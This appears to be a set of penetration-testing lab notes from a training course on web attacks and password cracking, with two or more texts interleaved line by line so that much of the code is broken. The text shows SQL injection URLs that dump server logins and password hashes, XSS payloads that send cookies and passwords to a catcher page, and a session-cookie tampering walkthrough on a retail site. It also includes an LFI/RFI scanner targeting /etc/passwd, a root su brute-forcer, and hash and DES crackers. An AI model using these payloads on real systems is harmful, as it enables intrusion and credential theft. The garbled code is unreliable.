https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 100--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 50--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 25--
import urllib
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 10--
from bs4 import BeautifulSoup
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 5--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 6--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 7--
The Python script given below will gather the title of web page andhyperlinks:
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 8--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 9--
Now,  we  need  a variable,  which can  store  the  URL  of  the  website.  Here, we  will  use  avariable named ‘url’. We will also use thepage.read()function that can store the web page and assign the web page to the variable html_page.
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------
 
  We are using a union select statement because we are joining the developer's query with one of our own.
from urllib.request import urlopen
   Reference:
   http://www.techonthenet.com/sql/union.php
url = 'http://www.python.org'
   The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
file = urlopen(url)
   It removes duplicate rows between the various SELECT statements.
html_page = file.read()

   Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
 
The html_page will be assigned as an input to create soup object.

 
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
soup_object = BeautifulSoup(html_page)

 
   Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
Following two lines will print the title name with tags and without tags respectively.

---------------------------Type This-----------------------------------
 
print(soup_object.title)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
print(soup_object.title.text)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
The line of code shown below will save all the hyperlinks.

-----------------------------------------------------------------------
 
for link in soup_object.find_all('a'):

   print(link.get('href'))

 
- Another way is to see if you can get the backend to perform an arithmetic function
 
---------------------------Type This-----------------------------------
 
*** Full example code: ***
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(2)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-2)  
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-1)
 
import urllib

 
from bs4 import BeautifulSoup
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=1--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=2--
from urllib.request import urlopen
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=1*1
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 >-1#
url = 'http://www.python.org'
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<99#
file = urlopen(url)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<>1#
html_page = file.read()
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 2 != 3--
print(html_page)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 &0#
 
soup_object= BeautifulSoup(html_page)

 
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=1--
print(soup_object.title)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=2--
print(soup_object.title.text)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='joe' and 1=1--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='dbo' and 1=1--
 
for link in soup_object.find_all('a'):

   print(link.get('href'))

 
###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
# Banner grabbing #

3 - Total Characters
---------------------------Type This-----------------------------------
 
The following Python script helps grab the banner using socket programming:
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
------------------------------------------------------------------------------
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)
-----------------------------------------------------------------------
 
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.htons(0x0800))

 
host = input("Enter the host name: ")

port = int(input("Enter Port: "))

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
-----------------------------------------------------------------------
# host = '192.168.1.54'

# port = 22

 
s.connect((host, port))

 
D  - 1st Character
    s.send(b'GET HTTP/1.1 \r\n')
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--  
    ret = s.recv(1024)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
    print('[+]{}'.format(ret))
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
except Exception as e:
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
    print('[-] Not information grabbed: {}'.format(e))

B - 2nd Character
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
After running the above script, we will get similar kind of information about headers as we got from the Python script of footprinting of HTTP headers in the previous section.
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
 
O - 3rd Character
###################################################
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
# Server-side Validation & Client-side Validation #
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
###################################################
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
#######################################
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      
# Python Module for Validation Bypass #
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
#######################################

-----------------------------------------------------------------------
 
The Python module that we are going to useis mechanize. Itis a Python web browser, whichis  providing  the  facility  of  obtaining  web  forms  in  a  web  page  and  facilitates  the submission of input values too. With the help of mechanize,we can bypass the validation and temper client-side parameters. However,before importing it in our Python script,we need to install it by executing the following command:

 
 
pip3 install mechanize              <-- This is already installed. You don't have to do this step

 
 
################################
# Playing with session cookies #
Following is a Python script, which uses mechanize to bypass the validation of a web form using  POST  method  to  pass  the  parameter.  The  web  form  can  be  taken  from  the  link https://www.tutorialspoint.com/php/php_validation_example.htm and can be used in any dummy website of your choice.

 
To begin with, let us import the mechanize browser:

Step 1: Browse to NewEgg.com
-------------------------Paste this into Firefox-----------------------------------
----------------------
https://secure.newegg.com/
import mechanize
----------------------------------------------------------------------------------
----------------------

 
Now, we will create an object named brwsr of the mechanize browser:
Step 2: Browse to the shopping cart page NewEgg.com
-------------------------Paste this into Firefox-----------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
brwsr = mechanize.Browser()
----------------------------------------------------------------------------------
 
 
The next line of code shows that the user agent is not a robot
Step 3: View the current session ID
-------------------------Paste this into Firefox-----------------------------------
--------------------------------
javascript:void(document.write(document.cookie))
brwsr.set_handle_robots( False )

--------------------------------

Step 4: Go back to the shopping cart page (click the back button)
Now, we need to provide the url of our dummy website containing the web form on which we need to bypass validation.
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------
url = input("Enter URL ")

 
Step 5: Now let's modify the session ID
Now, following lines will set some parenters to true.
-------------------------Paste this into Firefox-----------------------------------
javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
-----------------------------------

brwsr.set_handle_equiv(True)

brwsr.set_handle_gzip(True)

brwsr.set_handle_redirect(True)

brwsr.set_handle_referer(True)
Step 6: Go back to the shopping cart page (click the back button)
----------------------------------
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------
Next it will open the web page and print the web form on that page.

 
 
brwsr.open(url)
Step 7: View the current session ID
for form in brwsr.forms():
-------------------------Paste this into Firefox-----------------------------------
   print(form)
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------
 
Next line of codes will bypass the validations on the given fields.

 
------------------------------------

brwsr.select_form(nr=0)
# What is XSS                             #
brwsr.form['name'] = ''
# https://phpapp.infosecaddicts.com/2-Intro_To_XSS.pptx #
brwsr.form['gender'] = ''

brwsr.submit()

------------------------------------

 
The last part of the script can be changed according to the fields of web form on which we want to bypass validation. Here in the above script, we have takentwo fields —‘name’ and ‘gender’ which cannot be left blank (you can see in the coding of web form) but this script will bypass that validation.

---------------------------Type This-----------------------------------
 
################################################
   https://phpapp.infosecaddicts.com/xss_practice/
# Python Penetration Testing — SQLi Web Attack #

################################################

   A really simple search page that is vulnerable should come up.
 
 
The attack can be categorize into the following two types:

 
- In-band SQL injection (Simple SQLi)

- Inferential SQL injection (Blind SQLi)

 
   <script>alert('So this is XSS')</script>
All types of SQLi can be implemented by manipulating input data to the application. In the following  examples,  we  are  writing  a  Python  script  to  inject  attack  vectors  to  the application  and  analyze  the  output  to  verify  the  possibility  of  the  attack.  Here,  we are going to use python module named mechanize, which gives the facility of obtaining web forms in a web page and facilitates the submission of input values too. We have also used this module for client-side validation.

 
 
The  following Python  script helps submit  forms  and analyze the  response  using mechanize:
   This should pop-up an alert window with your message in it proving XSS is in fact possible.
   Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
 
First of all we need to import the mechanize module.

3. In the search box type:
-----------------------

import mechanize

-----------------------
   <script>alert(document.cookie)</script>
-----------------------------------------------------------------------
Now, provide the name of the URL for obtaining the response after submitting the form.

 
   This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
url = input("Enter the full url")
   Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
 
4. Now replace that alert script with:
The following line of codes will open the url.

 
-----------------------------------
   <script>document.location="https://phpapp.infosecaddicts.com/xss_practice/cookie_catcher.php?c="+document.cookie</script>
request = mechanize.Browser()

request.open(url)

-----------------------------------

This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
Now, we need to select the form.

 
5. Now view the stolen cookie at:
request.select_form(nr=0)

 
   https://phpapp.infosecaddicts.com/xss_practice/cookie_stealer_logs.html
Here,we will setthe column name ‘id’.

 
 
request["id"] = "1 OR 1=1"

 
 
Now, we need to submit the form

 
 
response = request.submit()

content = response.read()

print(content)

--------------------------------

 
The above script will print the response for the POST request. We have submitted an attack vector to break the SQL query and print all the data in the table instead of one row. All the attack vectors will be saved in a text file say vectors.txt. Now, the Python script given below will get those attack vectors from the file and send them to the server one by one. It will also save the output to a file.

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
To begin with, let us import the mechanize module.

 
Use Firefox to browse to the following location:
import mechanize

 
  https://phpapp.infosecaddicts.com/xss_practice/
Now, provide the name of the URL for obtaining the response after submitting the form.

 
 
url = input("Enter the full url")

   attack_no = 1

----------------------------
 
 
We need to read the attack vectors from the file

 
<script>
with open ('vectors.txt') as v:

document.write("<img src=\"https://phpapp.infosecaddicts.com/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>
Now we will send request with each arrack vector

 
 
for line in v:

   browser.open(url)

browser.select_form(nr=0)

   browser["id"] = line
  https://phpapp.infosecaddicts.com/xss_practice/passwords.html
   res = browser.submit()

content = res.read()

 
 

Now, the following line of code will write the response to the output file.


-----------------------------------------------------

output = open('response/'+str(attack_no)+'.txt','w')

output.write(content)

output.close()

print attack_no

attack_no += 1

-----------------------------------------------------



By  checking  and  analyzing  the  responses, we  can  identify  the  possible  attacks. For example,if it provides the response that include the sentence You have an error in your SQL syntax then it means the form may be affected by SQL injection.


##############################
###############################################
# Bannergrabbing a webserver #
# Python Penetration Testing — XSS Web Attack #

###############################################

---------------------------Type This-----------------------------------
nano bannergrab.py
Types of XSS Attack

 
---------------------------Paste This----------------------------------
The  attack can  be classified into the following major categories:

#!/usr/bin/env python3
-Persistent or stored XSS

-Non-persistent or reflected XSS

 
# Great reference: https://www.mkyong.com/python/python-3-typeerror-cant-convert-bytes-object-to-str-implicitly/
 
Same as SQLi, XSS web attacks can be implemented by manipulating input data to the application. In the following examples, we are modifying the SQLi attack vectors, done in previous section, to test XSS web attack. The Python script given below helps analyze XSS attack using mechanize:

s.connect(("45.63.104.73", 80))
To begin with, let us import the mechanize module.

 
#Convert response to bytes
import mechanize

-----------------------

#response = "".encode()
 
Now, provide the name of the URL for obtaining the response after submitting the form.

    data = s.recv(4096)
----------------------------------

url = input("Enter the full url")

   attack_no = 1

----------------------------------

print(response.decode())
We need to read the attack vectors from the file.

 
---------------------------------------

with open ('vectors_XSS.txt') as x:

python3 bannergrab.py
-----------------------------------------------------------------------
Now we will send request with each arrack vector


-------------------------

for line in x:

   browser.open(url)

browser.select_form(nr=0)

   browser["id"] = line

   res = browser.submit()

content = res.read()

 
To begin with, we need to import the requests library:
 
The following line of code will check the printed attack vector.

import requests
---------------------------
if content.find(line) > 0:

   print("Possible XSS")

 
----------------------------------------------------------------------------
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
The following line of code will write the response to output file.

 
The following line of code is the main loop of the script, which will send the HTTP packets to the web server and print the method and the status code.
 
output = open('response/'+str(attack_no)+'.txt','w')

output.write(content)

output.close()
   req = requests.request(method, 'https://www.google.com')
print attack_no

attack_no += 1

----------------------------------------------------------


------------------------------------------------------
*** Full example code: ***

   req = requests.request(method, 'https://www.darkoperator.com')
------------------------------------------------------------------

import mechanize


url = input("Enter the full url")

attack_no = 1

for method in method_list:
with open ('vectors_XSS.txt') as x:

   for line in x:

      browser.open(url)

   browser.select_form(nr=0)

      browser["id"] = line

      res = browser.submit()

   content = res.read()

   req = requests.request(method, 'http://www.dybedu.com')
   if content.find(line) > 0:

      print("Possible XSS")


   output = open('response/'+str(attack_no)+'.txt','w')

   output.write(content)

   output.close()

   print attack_no

   attack_no += 1

-----------------------------------------------------------------

-------------------------------------------------------------
XSS occurs when a user input prints to the response without any validation. Therefore, to check the possibility of an XSS attack, we can check the response text for the attack vector we  provided.  If  the  attack  vector  is  present  in  the  response  without  any escape or validation,there is a high possibility of XSS attack.

 
*** Full code with example url: ***
 
---------------------------Type This-----------------------------------
nano xst.py
 
 
---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
for method in method_list:
   req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
   print (method, req.status_code, req.reason)
if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
   print ('Cross Site Tracing(XST) is possible')
 
-------------------------------------------------------------------------
 
 
After running the above script for a particular web server, we will get 200 OK responses for a particular method accepted by the web server. We will get a 403 Forbidden response if the web server explicitly denies the method. Once we send the TRACE method for testing cross  site  tracing  (XST), we  will  get 405  Not  Allowed responses  from  the  web  server otherwise we will get the message ‘Cross Site Tracing(XST) is possible’.
 
 
---------------------------Type This-----------------------------------
python3 xst.py
-----------------------------------------------------------------------
 


##########################################
# Foot printing by checking HTTP headers #
##########################################
 
 
HTTP headers are found in both requests and responses from the web server. They also carry very important information about servers. That is why penetration tester is always interested in parsing information through HTTP headers. Following is a Python script for getting the information about headers of the web server:
 
To begin with, let us import the requests library:
 
------------------------
import requests
------------------------
################# Do not do this lab #################

We need to send a  GET request to the web  server. The following line  of code makes a simple GET request through the requests library.
nano titlegrab.py

---------------------------------------------
request = requests.get('enter the URL')
---------------------------------------------
 
Next, we will generate a list of headers about which you need the information.
from bs4 import BeautifulSoup

---------------------------------------------------------------------------------------------------------------
def main():

    print("\nPage URL and Title")

    print("-----------------------------------------------------------------")

Next is a try and except block.
    urls = ['http://www.google.com', 'http://www.cnn.com', 'http://www.foxnes.com']

---------------------------------------------------
    for url in urls:

        r = requests.get(url)

        soup = BeautifulSoup(r.text, 'html.parser')

      result = request.headers[header]
        print(url + " = " + soup.title.string)

   except Exception as err:
if __name__ == "__main__":

    main()

---------------------------------------------------
################# end of lab that doesn't work #################

 
 
 
*** Example Full Code: ***
 
---------------------------Type This-----------------------------------
nano headercheck.py
 
 
---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
request = requests.get('https://dvws1.infosecaddicts.com/dvws1/appinfo.php')
header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
for header in header_list:
      try:
         result = request.headers[header]
         print ('%s: %s' % (header, result))
TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION

for x in range(1,TravLimit): ## ITERATE THROUGH THE LOOP

----------------------------------------------------------------------------------------------------------------
 
 
After running the above script for a particular web server, we will get the information about the  headers  provided  in  the  header  list.  If  there  will  be  no  information  for  a  particular header then it will give the message ‘No Details Found’.
 
 
   if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE

python3 headercheck.py
-----------------------------------------------------------------------
 
 
TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION

# Testing insecure web server configurations #
##############################################
 
We can use HTTP header information to test insecure web server configurations. In the following Python script, we are going to use try/except block to test insecure web server headers for number of URLs that are saved in a text file name websites.txt.
---------------------------Type This-----------------------------------
if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE

 
---------------------------Paste This----------------------------------
print("\nScan Complete\n") ## DONE

https://www.cnn.com
https://foxnews.com
https://phpapp.infosecaddicts.com/
https://aspdotnetapp.infosecaddicts.com/
https://dvws1.infosecaddicts.com/
-----------------------------------------------------------------------
 
 
 
 
---------------------------Type This-----------------------------------
nano insecure_config_check.py
 
 
---------------------------Paste This----------------------------------
################################################

# Python Penetration Testing—Application Layer #

################################################
# Reference: https://www.keycdn.com/blog/http-security-headers

import requests
urls = open("websites.txt", "r")
for url in urls:
   url = url.strip()
   req = requests.get(url)
   print (url, 'report:')
   try:
      protection_xss = req.headers['X-XSS-Protection']
      if protection_xss != '1; mode=block':
         print ('X-XSS-Protection not set properly, it may be possible:', protection_xss)
   except:
      print ('X-XSS-Protection not set, it may be possible')
   try:
      options_content_type = req.headers['X-Content-Type-Options']
      if options_content_type != 'nosniff':
         print ('X-Content-Type-Options not set properly:', options_content_type)
   except:
      print ('X-Content-Type-Options not set')
   try:
      transport_security = req.headers['Strict-Transport-Security']
   except:
      print ('HSTS header not set properly, Man in the middle attacks is possible')
   try:
   req = requests.request(method, 'Enter the URL’)

      print ('Content-Security-Policy set:', content_security)
   except:
      print ('Content-Security-Policy missing')
 
-----------------------------------------------------------------------
 
 
---------------------------Type This-----------------------------------
python3 insecure_config_check.py
-----------------------------------------------------------------------
 
 
 

 
 

 
---------------------------Type This-----------------------------------
nano LFI-RFI.py
 
 
---------------------------Paste This----------------------------------
 
#!/usr/bin/env python3
print("\n### PHP LFI/RFI Detector ###")
 
import urllib.request, urllib.error, urllib.parse,re,sys
 
After running the above script for a particular web server, we will get 200 OK responses for a particular methodaccepted by the web server. We will get a 403 Forbidden response if the web server explicitly denies the method. Once we send the TRACE method for testing cross  site  tracing  (XST), we  will  get 405  Not  Allowed responses  from  the  web  server otherwise we will get the message ‘Cross Site Tracing(XST) is possible’.

RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
TravLimit = 12
 
print("==> Testing for LFI vulns..")
TARGET = TARGET.split("=")[0]+"=" 				## URL MANUPLIATION
for x in range(1,TravLimit): 					## ITERATE THROUGH THE LOOP
   TARGET += "../"
   try:
       source = urllib.request.urlopen((TARGET+"etc/passwd")).read().decode() ## WEB REQUEST
   except urllib.error.URLError as e:
       print("$$$ We had an Error:",e)
       sys.exit(0)
   if re.search("root:x:0:0:",source): 			## SEARCH FOR TEXT IN SOURCE
       print("!! ==> LFI Found:",TARGET+"etc/passwd")
       break ## BREAK LOOP WHEN VULN FOUND
 
print("\n==> Testing for RFI vulns..")
TARGET = TARGET.split("=")[0]+"="+RFIVULN 		## URL MANUPLIATION
try:
   source = urllib.request.urlopen(TARGET).read().decode() ## WEB REQUEST
except urllib.error.URLError as e:
   print("$$$ We had an Error:",e)
   sys.exit(0)
if re.search("Hello world",source): 			## SEARCH FOR TEXT IN SOURCE
   print("!! => RFI Found:",TARGET)
   
print("\nScan Complete\n") 						## DONE
----------------------------------------------------------------------
 
 
 
 
---------------------------Type This-----------------------------------
python3 LFI-RFI.py
-----------------------------------------------------------------------
 
 
 

 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



                           ###########################################
----------- ############### # Day 5: Password cracking and Forensics ############### -----------
                           ###########################################

 
---------------------------Type This-----------------------------------

nano list.txt
 
---------------------------Paste This-----------------------------------
 
hello
goodbye
red
blue
yourname
tim
bob
joe
 
-----------------------------------------------------------------------
 

 

 
 
---------------------------Type This-----------------------------------
 
nano rootbrute.py
 
---------------------------Paste This-----------------------------------
 
#!/usr/bin/env python3

import sys
try:
        import pexpect
except(ImportError):
        print("\nYou need the pexpect module.")
        print("http://www.noah.org/wiki/Pexpect\n")
        sys.exit(1)

# Change this if needed.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"


def brute(word):
        print("Trying:", word)
        child = pexpect.spawn('/bin/su')
        child.expect('Password: '.encode("utf-8"))
        child.sendline(word)
#!/usr/bin/eve python3
        i = child.expect(['.+\s#\s', LOGIN_ERROR, pexpect.TIMEOUT], timeout=3)
        if i == 1:
                print("Incorrect Password")

        if i == 2:
                print("\n\t[!] Root Password:", word, i)
                child.sendline('id')
                print(child.before)
                child.interact()


if len(sys.argv) != 2:
        print("\nUsage : ./rootbrute.py <wordlist>")
        print("Eg: ./rootbrute.py words.txt\n")
        sys.exit(1)

try:
        words = open(sys.argv[1], "r").readlines()
except(IOError):
        print("\nError: Check your wordlist path\n")
        sys.exit(1)

print("\n[+] Loaded:", len(words), "words")
print("[+] BruteForcing...\n")
for word in words:
        brute(word.replace("\n", ""))
-----------------------------------------------------------------------
 
 
References you might find helpful:
http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
 

---------------------------Type This----------------------------------- 
python3 rootbrute.py list.txt
-----------------------------------------------------------------------


# Footprinting of a Web Application #

 
 
Methods for Footprinting of a Web Application

 
 
Gathering information using parser BeautifulSoup

 
 
Suppose we want to collect all the hyperlinks from  a  web page; we can make use of a parser called BeautifulSoup.The parser is a Python library for pulling data out of HTML and XML files. It can be used with urlib because it needs an input (document or url) to create a soup object and it can’t fetch web page by itself.
nano md5crack.py
 
To  begin  with,  let  us import  the  necessary  packages. We  will  import urlib and BeautifulSoup. Remember before importing BeautifulSoup, we need to install it.

---------------------------Paste This-----------------------------------
 #!/usr/bin/env python3
apt-get install python3-bs4             <-- This is already installed. You don't have to do this step

import hashlib
import sys

if len(sys.argv) != 3:
import urllib

from bs4 import BeautifulSoup


pw = sys.argv[1]
The Python script given below will gather the title of web page andhyperlinks:

try:
Now,  we  need  a variable,  which can  store  the  URL  of  the  website.  Here, we  will  use  avariable named ‘url’. We will also use thepage.read()function that can store the web page and assign the web page to the variable html_page.
	words = open(wordlist, "r")
except(IOError):
	print("Error: Check your wordlist path\n")
	sys.exit(1)
from urllib.request import urlopen

print("\n", len(words), "words loaded...")
url = 'http://www.python.org'

file = urlopen(url)

html_page = file.read()
	hash = hashlib.md5()
	hash.update(word[:-1].encode('utf-8'))
	value = hash.hexdigest()
The html_page will be assigned as an input to create soup object.

for (key, value) in hashes.items():
	if pw == value:
soup_object = BeautifulSoup(html_page)
		print("Password is:", key, "\n")
-----------------------------------------------------------------------
 
Following two lines will print the title name with tags and without tags respectively.

 
 
print(soup_object.title)

print(soup_object.title.text)



The line of code shown below will save all the hyperlinks.

---------------------------Type This----------------------------------- 
python3 md5crack.py 8ff32489f92f33416694be8fdc2d4c22 list.txt
for link in soup_object.find_all('a'):
----------------------------------------------------------------------- 
   print(link.get('href'))

 
 
 

####### Challenge ########
*** Full example code: ***
I will buy lunch (a nice lunch), for the person that can explain how the htcrack.py script works.

Teamwork makes the dreamwork. Google is your friend.
####### Challenge ########
import urllib


from bs4 import BeautifulSoup

---------------------------Type This-----------------------------------
from urllib.request import urlopen

htpasswd -nd yourname
url = 'http://www.python.org'
    - enter yourname as the password
file = urlopen(url)

html_page = file.read()

print(html_page)

 
soup_object= BeautifulSoup(html_page)
nano htcrack.py
 
---------------------------Paste This-----------------------------------
print(soup_object.title)

print(soup_object.title.text)
import crypt
import sys

for link in soup_object.find_all('a'):

   print(link.get('href'))

	print("ex: ./htcrack.py user:62P1DYLgPe5S6 [path to wordlist]")
	sys.exit(1)

pw = sys.argv[1].split(":", 1)

# Banner grabbing #

	words = open(sys.argv[2], "r")
except(IOError):
	print("Error: Check your wordlist path\n")
The following Python script helps grab the banner using socket programming:


------------------------------------------------------------------------------

print("\n-d3hydr8[at]gmail[dot]com htcrack v[1.0]-")
print("     - http://darkcode.ath.cx -")
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.htons(0x0800))
print("\n", len(wds), "words loaded...")

host = input("Enter the host name: ")

port = int(input("Enter Port: "))
	if crypt.crypt(w[:-1], pw[1][:2]) == pw[1]:
		print("\nCracked:", pw[0] + ":" + w, "\n")
-----------------------------------------------------------------------
# host = '192.168.1.54'

# port = 22


s.connect((host, port))
---------------------------Type This----------------------------------- 
python3 htcrack.py joe:7XsJIbCFzqg/o list.txt
-----------------------------------------------------------------------
    s.send(b'GET HTTP/1.1 \r\n')

    ret = s.recv(1024)

    print('[+]{}'.format(ret))

except Exception as e:

    print('[-] Not information grabbed: {}'.format(e))

 
nano DES-Bruteforce.py
After running the above script, we will get similar kind of information about headers as we got from the Python script of footprinting of HTTP headers in the previous section.

---------------------------Paste This-----------------------------------
import base64
###################################################
from Crypto.Cipher import DES
# Server-side Validation & Client-side Validation #
THRESH = 0.9
###################################################
keyFile = open("keys.txt")
keys = keyFile.readlines()
ciph = base64.decodebytes(b'ESzjTnGMRFnfVOJwQfqtyXOI8yzAatioyufiSdE1dx02McNkZ2IvBg==\n')
#######################################

# Python Module for Validation Bypass #
for key in keys:
#######################################
	obj = DES.new(key[0:8].encode("utf-8"), DES.MODE_ECB)
	decodedStr = str(obj.decrypt(ciph))

The Python module that we are going to useis mechanize. Itis a Python web browser, whichis  providing  the  facility  of  obtaining  web  forms  in  a  web  page  and  facilitates  the submission of input values too. With the help of mechanize,we can bypass the validation and temper client-side parameters. However,before importing it in our Python script,we need to install it by executing the following command:
	foundLetters = 0
	for eachChar in decodedStr:
		# print(THRESH)
pip3 install mechanize              <-- This is already installed. You don't have to do this step
		if eachChar.isalpha() or eachChar.isdigit() or eachChar.isspace():
			foundLetters = foundLetters + 1
			# print(float(foundLetters) / float(len(decodedStr)))
		if (float(foundLetters) / float(len(decodedStr)) > THRESH):
			print("DES(ciphertext," + key[0:8] + ")=", obj.decrypt(ciph))
Following is a Python script, which uses mechanize to bypass the validation of a web form using  POST  method  to  pass  the  parameter.  The  web  form  can  be  taken  from  the  link https://www.tutorialspoint.com/php/php_validation_example.htm and can be used in any dummy website of your choice.


To begin with, let us import the mechanize browser:



----------------------
---------------------------Type This----------------------------------- 
import mechanize
python3 DES-Bruteforce.py
----------------------


Now, we will create an object named brwsr of the mechanize browser:



brwsr = mechanize.Browser()

---------------------------Type This-----------------------------------
 
The next line of code shows that the user agent is not a robot
nano extract-geo-location_from_image.py
 
--------------------------------

brwsr.set_handle_robots( False )

--------------------------------

from PIL import Image
